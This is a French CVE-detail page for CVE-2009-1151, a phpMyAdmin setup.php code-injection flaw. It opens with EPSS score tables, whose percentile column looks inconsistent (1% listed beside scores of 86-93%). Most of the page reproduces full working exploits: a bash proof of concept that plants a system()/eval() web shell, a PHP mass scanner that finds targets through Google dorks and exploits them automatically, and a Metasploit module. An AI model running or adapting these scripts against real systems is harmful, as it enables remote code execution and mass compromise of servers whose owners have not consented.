CVE-2009-1151 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	86.44%	–	–
2023-03-12	–	–	–	81.79%	–
2023-05-14	–	–	–	80.75%	–
2023-07-02	–	–	–	79.26%	–
2024-04-14	–	–	–	80.59%	–
2024-06-02	–	–	–	79.94%	–
2024-07-21	–	–	–	88.94%	–
2024-10-06	–	–	–	88.09%	–
2024-12-22	–	–	–	85.57%	–
2025-01-19	–	–	–	85.57%	–
2025-03-18	–	–	–	–	80.01%
2025-03-30	–	–	–	–	86.5%
2025-04-15	–	–	–	–	93.34%
2025-04-15	–	–	–	–	93.34,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	98%
2023-05-14	98%
2023-07-02	98%
2024-04-14	98%
2024-06-02	98%
2024-07-21	99%
2024-10-06	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	99%
2025-03-30	99%
2025-04-15	1%
2025-04-15	1%

#!/bin/bash # CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11 # by pagvac (gnucitizen.org), 4th June 2009. # special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln, # and to str0ke (milw0rm.com) for testing this PoC script and providing feedback! # PoC script successfully tested on the following targets: # phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1 # Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2) # attack requirements: # 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5 # and 3.x before 3.1.3.1 according to PMASA-2009-3 # 2) it *seems* this vuln can only be exploited against environments # where the administrator has chosen to install phpMyAdmin following # the *wizard* method, rather than manual method: http://snipurl.com/jhjxx # 3) administrator must have NOT deleted the '/config/' directory # within the '/phpMyAdmin/' directory. this is because this directory is # where '/scripts/setup.php' tries to create 'config.inc.php' which is where # our evil PHP code is injected 8) # more info on: # http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php # http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/ if [[ $# -ne 1 ]] then echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>" echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/" exit fi if ! which curl >/dev/null then echo "sorry but you need curl for this script to work!" echo "on Debian/Ubuntu: sudo apt-get install curl" exit fi function exploit { postdata="token=$1&action=save&configuration="\ "a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\ "%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\ "%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\ "%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\ "%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix" postdata2="token=$1&action=save&configuration=a:1:"\ "{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\ "%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\ "system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\ "if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\ "(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\ "%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\ "mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\ "%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\ "%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix" flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html" echo "[+] attempting to inject phpinfo() ..." curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null then curl -ks --url "$3/config/config.inc.php" >$flag echo "[+] success! phpinfo() injected successfully! output saved on $flag" curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:" echo " $3/config/config.inc.php?c=ls+-l+/" echo " $3/config/config.inc.php?p=phpinfo();" echo " please send any feedback/improvements for this script to"\ "unknown.pentester<AT_sign__here>gmail.com" else echo "[+] no luck injecting to $3/config/config.inc.php :(" exit fi } # end of exploit function cookiejar="/tmp/$(basename $0).$RANDOM.txt" token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12` echo "[+] checking if phpMyAdmin exists on URL provided ..." #if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null if grep phpMyAdmin $cookiejar &>/dev/null then length=`echo -n $token | wc -c` # valid form token obtained? if [[ $length -eq 32 ]] then echo "[+] phpMyAdmin cookie and form token received successfully. Good!" # attempt exploit! exploit $token $cookiejar $1 else echo "[+] could not grab form token. you might want to try exploiting the vuln manually :(" exit fi else echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?" exit fi # milw0rm.com [2009-06-09]

<?php $list = array( '/phpmyadmin/', '/phpMyAdmin/', '/PMA/', '/pma/', '/admin/', '/dbadmin/', '/mysql/', '/myadmin/', '/phpmyadmin2/', '/phpMyAdmin2/', '/phpMyAdmin-2/', '/php-my-admin/', '/phpMyAdmin-2.2.3/', '/phpMyAdmin-2.2.6/', '/phpMyAdmin-2.5.1/', '/phpMyAdmin-2.5.4/', '/phpMyAdmin-2.5.5-rc1/', '/phpMyAdmin-2.5.5-rc2/', '/phpMyAdmin-2.5.5/', '/phpMyAdmin-2.5.5-pl1/', '/phpMyAdmin-2.5.6-rc1/', '/phpMyAdmin-2.5.6-rc2/', '/phpMyAdmin-2.5.6/', '/phpMyAdmin-2.5.7/', '/phpMyAdmin-2.5.7-pl1/', '/phpMyAdmin-2.6.0-alpha/', '/phpMyAdmin-2.6.0-alpha2/', '/phpMyAdmin-2.6.0-beta1/', '/phpMyAdmin-2.6.0-beta2/', '/phpMyAdmin-2.6.0-rc1/', '/phpMyAdmin-2.6.0-rc2/', '/phpMyAdmin-2.6.0-rc3/', '/phpMyAdmin-2.6.0/', '/phpMyAdmin-2.6.0-pl1/', '/phpMyAdmin-2.6.0-pl2/', '/phpMyAdmin-2.6.0-pl3/', '/phpMyAdmin-2.6.1-rc1/', '/phpMyAdmin-2.6.1-rc2/', '/phpMyAdmin-2.6.1/', '/phpMyAdmin-2.6.1-pl1/', '/phpMyAdmin-2.6.1-pl2/', '/phpMyAdmin-2.6.1-pl3/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2-beta1/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2/', '/phpMyAdmin-2.6.2-pl1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-rc1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-pl1/', '/phpMyAdmin-2.6.4-rc1/', '/phpMyAdmin-2.6.4-pl1/', '/phpMyAdmin-2.6.4-pl2/', '/phpMyAdmin-2.6.4-pl3/', '/phpMyAdmin-2.6.4-pl4/', '/phpMyAdmin-2.6.4/', '/phpMyAdmin-2.7.0-beta1/', '/phpMyAdmin-2.7.0-rc1/', '/phpMyAdmin-2.7.0-pl1/', '/phpMyAdmin-2.7.0-pl2/', '/phpMyAdmin-2.7.0/', '/phpMyAdmin-2.8.0-beta1/', '/phpMyAdmin-2.8.0-rc1/', '/phpMyAdmin-2.8.0-rc2/', '/phpMyAdmin-2.8.0/', '/phpMyAdmin-2.8.0.1/', '/phpMyAdmin-2.8.0.2/', '/phpMyAdmin-2.8.0.3/', '/phpMyAdmin-2.8.0.4/', '/phpMyAdmin-2.8.1-rc1/', '/phpMyAdmin-2.8.1/', '/phpMyAdmin-2.8.2/', '/sqlmanager/', '/mysqlmanager/', '/p/m/a/', '/PMA2005/', '/pma2005/', '/phpmanager/', '/php-myadmin/', '/phpmy-admin/', '/webadmin/', '/sqlweb/', '/websql/', '/webdb/', '/mysqladmin/', '/mysql-admin/', ); if($argc > 1) { print "|****************************************************************|\n"; print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n"; print " phpMyAdmin Code Injection RCE Scanner & Exploit\n"; print " This is PHP version original http://milw0rm.com/exploits/8921\n"; print " credit: Greg Ose, pagvac @ gnucitizen.org\n"; print " greetz: Hacking Expose!, HM Security, darkc0de\n"; print "|****************************************************************|\n"; print "\n"; print "Usage: php $argv[0] \n"; exit; } print "|****************************************************************|\n"; print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n"; print " phpMyAdmin Code Injection RCE Scanner & Exploit\n"; print " This is PHP version original http://milw0rm.com/exploits/8921\n"; print " credit: Greg Ose, pagvac @ gnucitizen.org\n"; print " greetz: Hacking Expose!, HM Security, darkc0de\n"; print "|****************************************************************|\n"; print "\n"; $Handlex = FOpen("pmaPWN.log", "a+"); FWrite($Handlex, "|****************************************************************|\n"); FWrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n"); FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n"); FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n"); FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n"); FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n"); FWrite($Handlex, "|****************************************************************|\n\n"); print "[-] Master, where you want to go today? \n"; print "[-] example dork: intitle:phpMyAdmin \n"; fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s "); $dork = trim(fgets(STDIN)); print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n"; FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n"); for($i = 0; $i <= 900; $i+=100) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 200); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_REFERER, "http://google.com"); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9'); $pg = curl_exec($ch); curl_close($ch); if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; } } foreach($res as $key) { foreach($key as $target) { $total++; } } print "[+] Done. $total rows return.\n"; FWrite($Handlex, "[+] Done. $total rows return.\n"); FClose($Handlex); foreach($res as $key) { foreach($key as $target) { $Handlex = FOpen("pmaPWN.log", "a+"); $real = parse_url($target); $url = "http://".$real['host']; print "\n[-] Scanning phpMyAdmin on ".$url."\n"; FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n"); FClose($Handlex); sleep(5); $curlHandle = curl_multi_init(); for ($i = 0;$i < count($list); $i++) $curl[$i] = addHandle($curlHandle,$url.$list[$i]); ExecHandle($curlHandle); for ($i = 0;$i < count($list); $i++) { $text[$i] = curl_multi_getcontent ($curl[$i]); //echo $url.$list[$i]."\n"; $Handlex = FOpen("pmaPWN.log", "a+"); if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) { print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]"; print "\n[+] Testing vulnerable, wait sec..\n"; FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]"); FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n"); if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) { print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n"; FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n"); } FClose($Handlex); exploit_site($url.$list[$i]); } } for ($i = 0;$i < count($list); $i++)//remove the handles curl_multi_remove_handle($curlHandle,$curl[$i]); curl_multi_close($curlHandle); sleep(5); } } function addHandle(&$curlHandle,$url) { $cURL = curl_init(); curl_setopt($cURL, CURLOPT_URL, $url); curl_setopt($cURL, CURLOPT_HEADER, 0); curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1); curl_setopt($cURL, CURLOPT_TIMEOUT, 10); curl_multi_add_handle($curlHandle,$cURL); return $cURL; } //execute the handle until the flag passed // to function is greater then 0 function ExecHandle(&$curlHandle) { $flag=null; do { //fetch pages in parallel curl_multi_exec($curlHandle,$flag); } while ($flag > 0); } function exploit_site($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 200); curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php"); $result = curl_exec($ch); curl_close($ch); $ch2 = curl_init(); curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch2, CURLOPT_HEADER, 1); curl_setopt($ch2, CURLOPT_TIMEOUT, 200); curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php"); $result2 = curl_exec($ch2); curl_close($ch2); //print $url; if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) { print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln"; print "\n[+] Exploiting, wait sec..\n"; $Handlex = FOpen("pmaPWN.log", "a+"); FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln"); FWrite($Handlex, "\n[+] Exploiting, wait sec..\n"); FClose($Handlex); exploit($url); } else { $Handlex = FOpen("pmaPWN.log", "a+"); print "\n[-] Shit! no luck.. not vulnerable\n"; FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n"); FClose($Handlex); } } function exploit($w00t) { $Handlex = FOpen("pmaPWN.log", "a+"); $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox //first get cookie + token $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); curl_setopt($curl, CURLOPT_USERAGENT, $useragent); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 200); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt"); $result = curl_exec($curl); curl_close($curl); if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches)); $token = $matches[1][1]; if ($token != '') { print "\n[!] w00t! w00t! Got token = " . $matches[1][1]; FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]); $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"; print "\n[+] Sending evil payload mwahaha.. \n"; FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n"); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); curl_setopt($curl, CURLOPT_TIMEOUT, 200); curl_setopt($curl, CURLOPT_USERAGENT, $useragent); curl_setopt($curl, CURLOPT_REFERER, $w00t); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $payload); curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt"); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); $result = curl_exec($curl); curl_close($curl); print "\n[!] w00t! w00t! You should now have shell here"; print "\n[+] ".$w00t."config/config.inc.php?c=id \n"; print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n"; FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here"); FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n"); } else { print "\n[!] Shit! no luck.. not vulnerable\n"; FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n"); return false; } FClose($Handlex); if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); } //exit(); } ?> # milw0rm.com [2009-06-22]

## # $Id: phpmyadmin_config.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PhpMyAdmin Config File Code Injection', 'Description' => %q{ This module exploits a vulnerability in PhpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on 3.0.1.1. The file where our payload is written (phpMyAdmin/config/config.inc.php) is not directly used by the system, so it may be a good idea to either delete it or copy the running config (phpMyAdmin/config.inc.php) over it after successful exploitation. }, 'Author' => [ 'Greg Ose', # Discovery 'pagvac', # milw0rm PoC 'egypt' # metasploit module ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9669 $', 'References' => [ [ 'CVE', '2009-1151' ], [ 'OSVDB', '53076' ], [ 'URL', 'http://www.milw0rm.com/exploits/8921' ], [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php' ], [ 'URL', 'http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { 'Space' => 4000, # unlimited really since our shellcode gets written to a file 'DisableNops' => true, # No filtering whatsoever, so no badchars 'Compat' => { 'ConnectionType' => 'find', }, 'Keys' => ['php'], }, 'Targets' => [ [ 'Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 24 2009')) register_options( [ OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpMyAdmin/']), ], self.class) end def exploit # First, grab the session cookie and the CSRF token print_status("Grabbing session cookie and CSRF token") uri = datastore['URI'] + "scripts/setup.php" response = send_request_raw({ 'uri' => uri}) if !response raise RuntimeError.new("Server did not respond to our initial request") return end if (response.body !~ /"token"\s*value="([^"]*)"/) raise RuntimeError.new("Couldn't find token and can't continue without it. Is URI set correctly?") return end token = $1 cookie = response["Set-Cookie"] # There is probably a great deal of randomization that can be done with # this format. config = "a:1:{s:7:\"Servers\";a:1:{i:0;a:6:{s:#{payload.encoded.length + 13}:\"" config << "host']='';" + payload.encoded + ";//" config << '";s:9:"' + rand_text_alpha(9) + '";s:9:"extension";s:6:"mysqli";s:12:"connect_type"' config << ';s:3:"tcp";s:8:"compress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"' + rand_text_alpha(4) + '";}}}' data = "token=#{token}&action=save&configuration=" data << Rex::Text.uri_encode(config) data << "&eoltype=unix" # Now that we've got the cookie and token, send the evil print_status("Sending save request") response = send_request_raw({ 'uri' => datastore['URI'] + "/scripts/setup.php", 'method' => 'POST', 'data' => data, 'cookie' => cookie, 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => data.length } }, 3) print_status("Requesting our payload") # very short timeout because the request may never return if we're # sending a socket payload timeout = 0.1 response = send_request_raw({ # Allow findsock payloads to work 'global' => true, 'uri' => datastore['URI'] + "/config/config.inc.php" }, timeout) handler end end